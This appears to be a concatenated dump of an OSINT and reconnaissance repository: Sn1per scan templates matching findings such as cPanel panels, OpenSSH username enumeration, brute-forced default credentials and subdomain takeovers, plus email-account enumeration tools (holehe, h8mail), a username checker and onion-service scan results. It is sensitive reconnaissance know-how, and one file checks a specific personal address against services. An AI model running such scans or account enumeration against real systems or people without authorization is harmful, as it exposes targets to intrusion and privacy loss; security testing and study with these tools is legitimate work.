MATCH="cPanel\ Login" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='' 10 | -------------------------------------------------------------------------------- /Sn1per/templates/active/cPanel_Login_Found_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='cPanel Login Found 2' 3 | URI=':2083/' 4 | METHOD='GET' 5 | MATCH="cPanel\ Login" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='' 10 | -------------------------------------------------------------------------------- /Sn1per/templates/active/phpMyAdmin_Scanner_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='phpMyAdmin Detected' 3 | URI='/phpmyadmin/' 4 | METHOD='GET' 5 | MATCH='<title>phpMyAdmin ' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/passive/network/CVE-2018-15473_-_OpenSSH_Username_Enumeration.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2018-15473 - OpenSSH Username Enumeration' 3 | FILENAME="$LOOT_DIR/output/msf-$TARGET-*-ssh_enumusers.txt" 4 | MATCH="\[+\]" 5 | SEVERITY='P3 - MEDIUM' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' 9 | TYPE="network" -------------------------------------------------------------------------------- /Sn1per/templates/passive/network/Default_Credentials_BruteX.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Default Credentials - BruteX' 3 | FILENAME="$LOOT_DIR/credentials/brutex-$TARGET.txt $LOOT_DIR/credentials/brutex-$TARGET-*.txt" 4 | MATCH="password\:\ " 5 | SEVERITY='P1 - CRITICAL' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' 9 | TYPE="network" -------------------------------------------------------------------------------- /Sn1per/templates/passive/network/Default_Credentials_NMap.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Default Credentials - NMap' 3 | FILENAME="$LOOT_DIR/output/nmap-$TARGET.txt $LOOT_DIR/output/nmap-$TARGET-*.txt" 4 | MATCH="Valid\ credentials" 5 | SEVERITY='P1 - CRITICAL' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' 9 | TYPE="network" -------------------------------------------------------------------------------- /Sn1per/templates/passive/network/Interesting_Domain_Found.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Interesting Domain Found' 3 | FILENAME="$LOOT_DIR/domains/domains-all-sorted_NA.txt" 4 | MATCH='admin|dev|portal|stage|prod|tst|test' 5 | SEVERITY='P5 - INFO' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' 9 | TYPE='network' -------------------------------------------------------------------------------- /Sn1per/templates/passive/network/Lack_of_SPF_DNS_Record.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Lack of SPF DNS Record' 3 | FILENAME="$LOOT_DIR/nmap/email-$TARGET.txt" 4 | MATCH="\[\+\]\ Spoofing\ possible" 5 | SEVERITY='P4 - LOW' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' 9 | TYPE='network' -------------------------------------------------------------------------------- /Sn1per/templates/passive/network/Possible_Takeover_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Possible Takeover Detected' 3 | FILENAME="$LOOT_DIR/nmap/takeovers-$TARGET.txt" 4 | MATCH='netlify|wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|modulus|unbounce|uservoice|wpengine|cloudapp' 5 | SEVERITY='P5 - INFO' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' 9 | TYPE='network' -------------------------------------------------------------------------------- /Sn1per/templates/passive/recursive/SMB_Info_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='SMB Info Disclosure' 3 | FILENAME="$LOOT_DIR/output/msf-$TARGET-port139.txt $LOOT_DIR/output/msf-$TARGET-port445.txt" 4 | MATCH="\[\+\]" 5 | SEVERITY='P4 - LOW' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' 9 | TYPE="network" 10 | -------------------------------------------------------------------------------- /Sn1per/templates/passive/recursive/SMBv1_Enabled.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='SMBv1 Enabled' 3 | FILENAME="$LOOT_DIR/output/nmap-$TARGET-*.txt" 4 | MATCH="SMBv1" 5 | SEVERITY='P3 - MEDIUM' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' 9 | TYPE="network" -------------------------------------------------------------------------------- /Sn1per/templates/passive/recursive/SSH_Version_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='SSH Version Disclosure' 3 | FILENAME="$LOOT_DIR/output/msf-$TARGET-*-ssh_version.txt" 4 | MATCH="\[\+\]" 5 | SEVERITY='P4 - LOW' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' 9 | TYPE="network" 10 | -------------------------------------------------------------------------------- /Sn1per/templates/passive/recursive/Subjack_Takeover_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Subjack Takeover Detected' 3 | FILENAME="$LOOT_DIR/nmap/subjack-$TARGET.txt" 4 | MATCH="\[Vulnerable\]" 5 | SEVERITY='P2 - HIGH' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' 9 | TYPE="network" -------------------------------------------------------------------------------- /Sn1per/templates/passive/recursive/Subover_Takeover_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Subover Takeover Detected' 3 | FILENAME="$LOOT_DIR/nmap/subover-$TARGET.txt" 4 | MATCH="Takeover\ Possible" 5 | SEVERITY='P2 - HIGH' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' 9 | TYPE="network" -------------------------------------------------------------------------------- /Sn1per/templates/passive/web/Autocomplete_Enabled.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Autocomplete Enabled' 3 | FILENAME="$LOOT_DIR/web/websource-$TARGET-*.txt" 4 | MATCH='autocomplete=\"on\"' 5 | SEVERITY='P4 - LOW' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' -------------------------------------------------------------------------------- /Sn1per/templates/passive/web/CORS_Policy_-_Allow-Credentials_Enabled.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CORS Policy - Allow-Credentials Enabled' 3 | FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET.txt" 4 | MATCH='Access-Control-Allow-Credentials: true' 5 | SEVERITY='P4 - LOW' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' -------------------------------------------------------------------------------- /Sn1per/templates/passive/web/CORS_Policy_-_Allow-Origin_Wildcard.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CORS Policy - Allow-Origin Wildcard' 3 | FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET.txt" 4 | MATCH='Access-Control-Allow-Origin: *' 5 | SEVERITY='P4 - LOW' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' -------------------------------------------------------------------------------- /Sn1per/templates/passive/web/CSP_Not_Enforced.sh: -------------------------------------------------------------------------------- 1 | if [ -f $LOOT_DIR/web/headers-http-$TARGET.txt ]; then 2 | if [ "$SSL" = "true" ]; then 3 | AUTHOR='@xer0dayz' 4 | VULN_NAME='CSP Not Enforced' 5 | FILENAME="$LOOT_DIR/web/headers-https-$TARGET.txt" 6 | MATCH="content-security-policy" 7 | SEVERITY='P5 - INFO' 8 | GREP_OPTIONS='-i' 9 | SEARCH='negative' 10 | SECONDARY_COMMANDS='' 11 | URI="" 12 | else 13 | AUTHOR='@xer0dayz' 14 | VULN_NAME='CSP Not Enforced' 15 | FILENAME="$LOOT_DIR/web/headers-http-$TARGET.txt" 16 | MATCH="content-security-policy" 17 | SEVERITY='P5 - INFO' 18 | GREP_OPTIONS='-i' 19 | SEARCH='negative' 20 | SECONDARY_COMMANDS='' 21 | URI="" 22 | fi 23 | fi -------------------------------------------------------------------------------- /Sn1per/templates/passive/web/Clear-text_Communications_HTTP.sh: -------------------------------------------------------------------------------- 1 | if [ "$SSL" = "false" ]; then 2 | AUTHOR='@xer0dayz' 3 | VULN_NAME='Clear-Text Protocol - HTTP' 4 | FILENAME="$LOOT_DIR/web/headers-http-$TARGET.txt" 5 | MATCH="200\ OK" 6 | SEVERITY='P2 - HIGH' 7 | GREP_OPTIONS='-i' 8 | SEARCH='positive' 9 | SECONDARY_COMMANDS='' 10 | else 11 | break 12 | fi -------------------------------------------------------------------------------- /Sn1per/templates/passive/web/Clickjacking.sh: -------------------------------------------------------------------------------- 1 | if [ -f $LOOT_DIR/web/headers-http-$TARGET.txt ]; then 2 | if [ "$SSL" = "false" ]; then 3 | AUTHOR='@xer0dayz' 4 | VULN_NAME='Clickjacking HTTP' 5 | FILENAME="$LOOT_DIR/web/headers-http-$TARGET.txt" 6 | MATCH="x-frame-options" 7 | SEVERITY='P4 - LOW' 8 | GREP_OPTIONS='-i' 9 | SEARCH='negative' 10 | SECONDARY_COMMANDS='' 11 | URI="" 12 | else 13 | AUTHOR='@xer0dayz' 14 | VULN_NAME='Clickjacking HTTPS' 15 | FILENAME="$LOOT_DIR/web/headers-https-$TARGET.txt" 16 | MATCH="x-frame-options" 17 | SEVERITY='P4 - LOW' 18 | GREP_OPTIONS='-i' 19 | SEARCH='negative' 20 | SECONDARY_COMMANDS='' 21 | URI="" 22 | fi 23 | fi -------------------------------------------------------------------------------- /Sn1per/templates/passive/web/Drupal_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Drupal Detected' 3 | FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET.txt" 4 | MATCH="X\-Generator\:\ Drupal\ " 5 | SEVERITY='P5 - INFO' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' -------------------------------------------------------------------------------- /Sn1per/templates/passive/web/Expired_SSL_Certificate.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Expired SSL Certificate' 3 | FILENAME="$LOOT_DIR/web/curldebug-$TARGET.txt" 4 | MATCH='certificate has expired' 5 | SEVERITY='P3 - MEDIUM' 6 | GREP_OPTIONS='' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' -------------------------------------------------------------------------------- /Sn1per/templates/passive/web/Fortinet_FortiGate_SSL_VPN_Panel_Passive_Detection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Fortinet FortiGate SSL VPN Panel Passive Detection' 3 | FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET.txt" 4 | MATCH="Server\:\ xxxxxxxx-xxxxx" 5 | SEVERITY='P5 - INFO' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' -------------------------------------------------------------------------------- /Sn1per/templates/passive/web/Insecure_Cookie_-_HTTPOnly_Not_Set.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Insecure Cookie - HTTPOnly Not Set' 3 | FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET.txt" 4 | MATCH='Set-Cookie' 5 | SEVERITY='P3 - MEDIUM' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS=' | egrep -iv httponly' -------------------------------------------------------------------------------- /Sn1per/templates/passive/web/Insecure_Cookie_-_Secure_Not_Set.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Insecure Cookie - Secure Not Set' 3 | FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET.txt" 4 | MATCH='Set-Cookie' 5 | SEVERITY='P3 - MEDIUM' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS=' | egrep -iv secure' -------------------------------------------------------------------------------- /Sn1per/templates/passive/web/Insecure_SSL_TLS_Connection.sh: -------------------------------------------------------------------------------- 1 | if [ "$SSL" = "true" ]; then 2 | AUTHOR='@xer0dayz' 3 | VULN_NAME='Weak SSL TLS Protocols' 4 | FILENAME="$LOOT_DIR/web/sslscan-$TARGET.txt" 5 | MATCH=' SSLv' 6 | SEVERITY='P2 - HIGH' 7 | GREP_OPTIONS='-i' 8 | SEARCH='positive' 9 | SECONDARY_COMMANDS='' 10 | fi -------------------------------------------------------------------------------- /Sn1per/templates/passive/web/Insecure_SSL_TLS_Connection_CN_Mismatch.sh: -------------------------------------------------------------------------------- 1 | if [ "$SSL" = "true" ]; then 2 | AUTHOR='@xer0dayz' 3 | VULN_NAME='Insecure SSL TLS Connection CN Mismatch' 4 | FILENAME="$LOOT_DIR/web/curldebug-$TARGET.txt" 5 | MATCH='failed to verify the legitimacy of the server' 6 | SEVERITY='P3 - MEDIUM' 7 | GREP_OPTIONS='-i' 8 | SEARCH='positive' 9 | SECONDARY_COMMANDS='' 10 | URI="/" 11 | else 12 | break 13 | fi 14 | -------------------------------------------------------------------------------- /Sn1per/templates/passive/web/Interesting_Title_Found.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Interesting Title Found' 3 | FILENAME="$LOOT_DIR/web/title-htt*-$TARGET.txt" 4 | MATCH='admin|dev|portal' 5 | SEVERITY='P5 - INFO' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' -------------------------------------------------------------------------------- /Sn1per/templates/passive/web/Server_Header_Disclosure.sh: -------------------------------------------------------------------------------- 1 | if [ "$SSL" = "false" ]; then 2 | AUTHOR='@xer0dayz' 3 | VULN_NAME='Server Header Disclosure - HTTP' 4 | FILENAME="$LOOT_DIR/web/headers-http-$TARGET.txt" 5 | MATCH="Server\:" 6 | SEVERITY='P4 - LOW' 7 | GREP_OPTIONS='-i' 8 | SEARCH='positive' 9 | SECONDARY_COMMANDS='' 10 | else 11 | AUTHOR='@xer0dayz' 12 | VULN_NAME='Server Header Disclosure - HTTPS' 13 | FILENAME="$LOOT_DIR/web/headers-https-$TARGET.txt" 14 | MATCH="Server\:" 15 | SEVERITY='P4 - LOW' 16 | GREP_OPTIONS='-i' 17 | SEARCH='positive' 18 | SECONDARY_COMMANDS='' 19 | fi -------------------------------------------------------------------------------- /Sn1per/templates/passive/web/Strict_Tranposrt_Security_Not_Enforced.sh: -------------------------------------------------------------------------------- 1 | if [ "$SSL" = "true" ]; then 2 | AUTHOR='@xer0dayz' 3 | VULN_NAME='Strict Tranposrt Security Not Enforced' 4 | FILENAME="$LOOT_DIR/web/headers-https-$TARGET.txt" 5 | MATCH="strict-transport-security" 6 | SEVERITY='P4 - LOW' 7 | GREP_OPTIONS='-i' 8 | SEARCH='negative' 9 | SECONDARY_COMMANDS='' 10 | else 11 | break 12 | fi -------------------------------------------------------------------------------- /Sn1per/templates/passive/web/Trace_Method_Enabled.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='TRACE Method Enabled' 3 | FILENAME="$LOOT_DIR/web/http_options-$TARGET-*.txt" 4 | MATCH='TRACE' 5 | SEVERITY='P4 - LOW' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' -------------------------------------------------------------------------------- /Sn1per/templates/passive/web/X-Powered-By_Header_Found.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='X-Powered-By Header Found' 3 | FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET.txt" 4 | MATCH='X-Powered-By' 5 | SEVERITY='P5 - INFO' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' -------------------------------------------------------------------------------- /TheInspector/config/Th3inspector.desktop: -------------------------------------------------------------------------------- 1 | [Desktop Entry] 2 | Name=Th3inspector 3 | Comment=Th3Inspector 🕵️ best tool for Information Gathering 🔎 4 | Encoding=UTF-8 5 | Exec=sh -c "Th3inspector;${SHELL:-bash}" 6 | Icon=Th3inspector.png 7 | StartupNotify=false 8 | Terminal=true 9 | Type=Application 10 | Categories=01-info-gathering; 11 | X-Kali-Package=Th3inspector 12 | Name[C]=Th3inspector 13 | -------------------------------------------------------------------------------- /TheInspector/config/Th3inspector.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kal1gh0st/OSINT/0416bcf6de1195cba2c827318895f693f0ef987d/TheInspector/config/Th3inspector.png -------------------------------------------------------------------------------- /Urs/docs/Some Linux Tips.md: -------------------------------------------------------------------------------- 1 | # Some Linux Tips 2 | 3 | * You can further simplify running the program by making the program executable: 4 | + `sudo chmod +x Urs.py` 5 | * Make sure the shebang at the top of `Urs.py` matches the location in which your Python3 is installed. You can use `which python` and then `python --version` to check. 6 | + The default shebang is `#!/usr/bin/python`. 7 | * Now you will only have to prepend `./` to run URS. 8 | + `./Urs.py ...` 9 | * Troubleshooting 10 | + You will have to set the fileformat to `UNIX` if you run URS with `./` and are greeted with a bad interpreter error. I did this using Vim. 11 | 12 | ``` 13 | $ vim Urs.py 14 | :set fileformat=unix 15 | :wq! 16 | ``` 17 | -------------------------------------------------------------------------------- /beginner-python/requests_with_json.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib 3 | import json 4 | 5 | google_news_section = "https://news.google.com/news?q=hockey&pz=1&cf=all&ned=ca&hl=en&output=rss" 6 | google_news_url = "http://ajax.googleapis.com/ajax/services/feed/load?v=1.0&q=%s" % urllib.quote(google_news_section) 7 | 8 | # send off the request 9 | response = requests.get(google_news_url) 10 | 11 | if response.status_code == 200: 12 | 13 | news = json.loads(response.content) 14 | 15 | for article in news['responseData']['feed']['entries']: 16 | print "%s - %s - %s" % (article['publishedDate'],article['title'],article['link']) -------------------------------------------------------------------------------- /beginner-python/username_check.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | username = "jms_dot_py" 4 | 5 | site_list = [ 6 | "https://twitter.com/", 7 | "https://instagram.com/", 8 | "https://ask.fm/", 9 | "http://pastebin.com/u/" 10 | ] 11 | 12 | for site in site_list: 13 | 14 | username_url = "%s%s" % (site,username) 15 | 16 | response = requests.get(username_url,allow_redirects=False) 17 | 18 | if response.status_code == 200: 19 | 20 | print "[*] Hit! %s" % username_url 21 | 22 | elif response.status_code == 301: 23 | 24 | print response.headers['Location'] 25 | -------------------------------------------------------------------------------- /e-mail_Osint/lib/__pycache__/headers.cpython-39.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kal1gh0st/OSINT/0416bcf6de1195cba2c827318895f693f0ef987d/e-mail_Osint/lib/__pycache__/headers.cpython-39.pyc -------------------------------------------------------------------------------- /e-mail_Osint/lib/demo-gif.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kal1gh0st/OSINT/0416bcf6de1195cba2c827318895f693f0ef987d/e-mail_Osint/lib/demo-gif.gif -------------------------------------------------------------------------------- /e-mail_Osint/lib/headers.py: -------------------------------------------------------------------------------- 1 | import colorama, os 2 | from colorama import Fore 3 | 4 | def Header(text): 5 | os.system('title Email Osint ^| '+text) 6 | print("") 7 | prt1 = Fore.GREEN+"> "+Fore.RESET 8 | bs = "-" * len(text) 9 | print(prt1+text+":\n"+"---"+bs) -------------------------------------------------------------------------------- /e-mail_Osint/modules/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /e-mail_Osint/modules/__pycache__/BreachedSites.cpython-39.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kal1gh0st/OSINT/0416bcf6de1195cba2c827318895f693f0ef987d/e-mail_Osint/modules/__pycache__/BreachedSites.cpython-39.pyc -------------------------------------------------------------------------------- /e-mail_Osint/modules/__pycache__/Holehe_Module.cpython-39.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kal1gh0st/OSINT/0416bcf6de1195cba2c827318895f693f0ef987d/e-mail_Osint/modules/__pycache__/Holehe_Module.cpython-39.pyc -------------------------------------------------------------------------------- /e-mail_Osint/modules/__pycache__/PastebinDump.cpython-39.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kal1gh0st/OSINT/0416bcf6de1195cba2c827318895f693f0ef987d/e-mail_Osint/modules/__pycache__/PastebinDump.cpython-39.pyc -------------------------------------------------------------------------------- /e-mail_Osint/modules/__pycache__/__init__.cpython-39.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kal1gh0st/OSINT/0416bcf6de1195cba2c827318895f693f0ef987d/e-mail_Osint/modules/__pycache__/__init__.cpython-39.pyc -------------------------------------------------------------------------------- /e-mail_Osint/modules/__pycache__/emailrep.cpython-39.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kal1gh0st/OSINT/0416bcf6de1195cba2c827318895f693f0ef987d/e-mail_Osint/modules/__pycache__/emailrep.cpython-39.pyc -------------------------------------------------------------------------------- /e-mail_Osint/modules/__pycache__/leakcheck.cpython-39.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kal1gh0st/OSINT/0416bcf6de1195cba2c827318895f693f0ef987d/e-mail_Osint/modules/__pycache__/leakcheck.cpython-39.pyc -------------------------------------------------------------------------------- /e-mail_Osint/modules/__pycache__/verify_email.cpython-39.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kal1gh0st/OSINT/0416bcf6de1195cba2c827318895f693f0ef987d/e-mail_Osint/modules/__pycache__/verify_email.cpython-39.pyc -------------------------------------------------------------------------------- /e-mail_Osint/modules/verify_email.py: -------------------------------------------------------------------------------- 1 | import requests, json, colorama 2 | from colorama import Fore 3 | 4 | def verify_email(email): 5 | try: 6 | r = requests.get('https://verify-email.org/home/verify-as-guest/test@gmail.com') 7 | data = r.json() 8 | status = data['response']['log'] 9 | if status == "Succes": 10 | print("Email Status: OK".replace("OK",Fore.GREEN+"OK"+Fore.RESET)) 11 | 12 | else: 13 | print("Email Status: FAIL".replace("FAIL",Fore.RED+"FAIL"+Fore.RESET)) 14 | 15 | except: 16 | print("Verify-email.org API limit reached. Try again in 1 hour.") -------------------------------------------------------------------------------- /e-mail_Osint/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | colorama 3 | scrape-search-engine 4 | leakcheck 5 | holehe 6 | terminaltables 7 | -------------------------------------------------------------------------------- /e8mail/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3-alpine 2 | 3 | RUN apk add --update --no-cache git bash 4 | WORKDIR h8mail 5 | RUN pip3 install requests 6 | COPY . . 7 | RUN ["python", "setup.py", "install"] 8 | ENTRYPOINT ["h8mail"] 9 | CMD ["-h"] 10 | -------------------------------------------------------------------------------- /e8mail/h8mail/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | """Top-level package for h8mail.""" 4 | 5 | from h8mail.utils.version import __version__ 6 | 7 | __author__ = """khast3x""" 8 | __email__ = "k@kast3x.club" 9 | -------------------------------------------------------------------------------- /e8mail/h8mail/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | -------------------------------------------------------------------------------- /e8mail/h8mail/utils/version.py: -------------------------------------------------------------------------------- 1 | __version__ = "2.5.5" 2 | -------------------------------------------------------------------------------- /e8mail/tests/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | """Unit test package for h8mail.""" 4 | -------------------------------------------------------------------------------- /e8mail/tests/test_email.txt: -------------------------------------------------------------------------------- 1 | john.smith@gmail.com 2 | test@example.com 3 | test@gmail.com 4 | -------------------------------------------------------------------------------- /holele/build/lib/holehe/__init__.py: -------------------------------------------------------------------------------- 1 | from holehe.core import * 2 | from holehe.localuseragent import * 3 | -------------------------------------------------------------------------------- /holele/dist/holehe-1.54.8-py3.9.egg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kal1gh0st/OSINT/0416bcf6de1195cba2c827318895f693f0ef987d/holele/dist/holehe-1.54.8-py3.9.egg -------------------------------------------------------------------------------- /holele/holehe.egg-info/PKG-INFO: -------------------------------------------------------------------------------- 1 | Metadata-Version: 1.1 2 | Name: holehe 3 | Version: 1.54.8 4 | Summary: holehe allows you to check if the mail is used on different sites like twitter, instagram , snapchat and will retrieve information on sites with the forgotten password function. 5 | Home-page: http://github.com/megadose/holehe 6 | Author: megadose 7 | Author-email: UNKNOWN 8 | License: UNKNOWN 9 | Description: UNKNOWN 10 | Platform: UNKNOWN 11 | Classifier: Programming Language :: Python 12 | Classifier: License :: OSI Approved :: GNU General Public License v3 (GPLv3) 13 | -------------------------------------------------------------------------------- /holele/holehe.egg-info/SOURCES.txt: -------------------------------------------------------------------------------- 1 | README.md 2 | setup.py 3 | holehe/__init__.py 4 | holehe/core.py 5 | holehe/localuseragent.py 6 | holehe.egg-info/PKG-INFO 7 | holehe.egg-info/SOURCES.txt 8 | holehe.egg-info/dependency_links.txt 9 | holehe.egg-info/entry_points.txt 10 | holehe.egg-info/requires.txt 11 | holehe.egg-info/top_level.txt -------------------------------------------------------------------------------- /holele/holehe.egg-info/dependency_links.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /holele/holehe.egg-info/entry_points.txt: -------------------------------------------------------------------------------- 1 | [console_scripts] 2 | holehe = holehe.core:main 3 | 4 | -------------------------------------------------------------------------------- /holele/holehe.egg-info/requires.txt: -------------------------------------------------------------------------------- 1 | requests 2 | argparse 3 | termcolor 4 | tqdm 5 | mechanize 6 | lxml 7 | bs4 8 | -------------------------------------------------------------------------------- /holele/holehe.egg-info/top_level.txt: -------------------------------------------------------------------------------- 1 | holehe 2 | -------------------------------------------------------------------------------- /holele/holehe/__init__.py: -------------------------------------------------------------------------------- 1 | #from holehe.core import * 2 | #from holehe.localuseragent import * 3 | from holehe import * 4 | print(adobe("fedele.kali17@gmail.com")) 5 | print(lastpass("fedele.kali17@gmail.com")) 6 | -------------------------------------------------------------------------------- /holele/holeledb/instruments.py: -------------------------------------------------------------------------------- 1 | import trio 2 | from tqdm import tqdm 3 | 4 | class TrioProgress(trio.abc.Instrument): 5 | def __init__(self, total): 6 | self.tqdm = tqdm(total=total) 7 | 8 | def task_exited(self, task): 9 | if task.name.split(".")[-1] == "launch_module": 10 | self.tqdm.update(1) -------------------------------------------------------------------------------- /instruments.py: -------------------------------------------------------------------------------- 1 | import trio 2 | from tqdm import tqdm 3 | 4 | class TrioProgress(trio.abc.Instrument): 5 | def __init__(self, total): 6 | self.tqdm = tqdm(total=total) 7 | 8 | def task_exited(self, task): 9 | if task.name.split(".")[-1] == "launch_module": 10 | self.tqdm.update(1) -------------------------------------------------------------------------------- /onionrunner/onion_result/22222222hkqnx4ec.onion.json: -------------------------------------------------------------------------------- 1 | {"hiddenService":"22222222hkqnx4ec.onion","webDetected":false,"sshDetected":false,"ricochetDetected":false,"ircDetected":false,"ftpDetected":false,"smtpDetected":false,"bitcoinDetected":false,"mongodbDetected":false,"vncDetected":false,"xmppDetected":false,"serverPoweredBy":"","serverVersion":"","foundApacheModStatus":false,"relatedOnionServices":null,"relatedOnionDomains":null,"linkedSites":null,"internalPages":null,"ipAddresses":null,"openDirectories":null,"exifImages":null,"interestingFiles":null,"pageReferencedDirectories":null,"pgpKeys":null,"hashes":null,"snapshot":"","pageTitle":"","responseHeaders":{},"bitcoinAddresses":null,"sshKey":"","ftpFingerprint":"","ftpBanner":"","smtpFingerprint":"","smtpBanner":""} 2 | -------------------------------------------------------------------------------- /onionrunner/onion_result/22222222mkwps52d.onion.json: -------------------------------------------------------------------------------- 1 | {"hiddenService":"22222222mkwps52d.onion","webDetected":false,"sshDetected":false,"ricochetDetected":false,"ircDetected":false,"ftpDetected":false,"smtpDetected":false,"bitcoinDetected":false,"mongodbDetected":false,"vncDetected":false,"xmppDetected":false,"serverPoweredBy":"","serverVersion":"","foundApacheModStatus":false,"relatedOnionServices":null,"relatedOnionDomains":null,"linkedSites":null,"internalPages":null,"ipAddresses":null,"openDirectories":null,"exifImages":null,"interestingFiles":null,"pageReferencedDirectories":null,"pgpKeys":null,"hashes":null,"snapshot":"","pageTitle":"","responseHeaders":{},"bitcoinAddresses":null,"sshKey":"","ftpFingerprint":"","ftpBanner":"","smtpFingerprint":"","smtpBanner":""} 2 | -------------------------------------------------------------------------------- 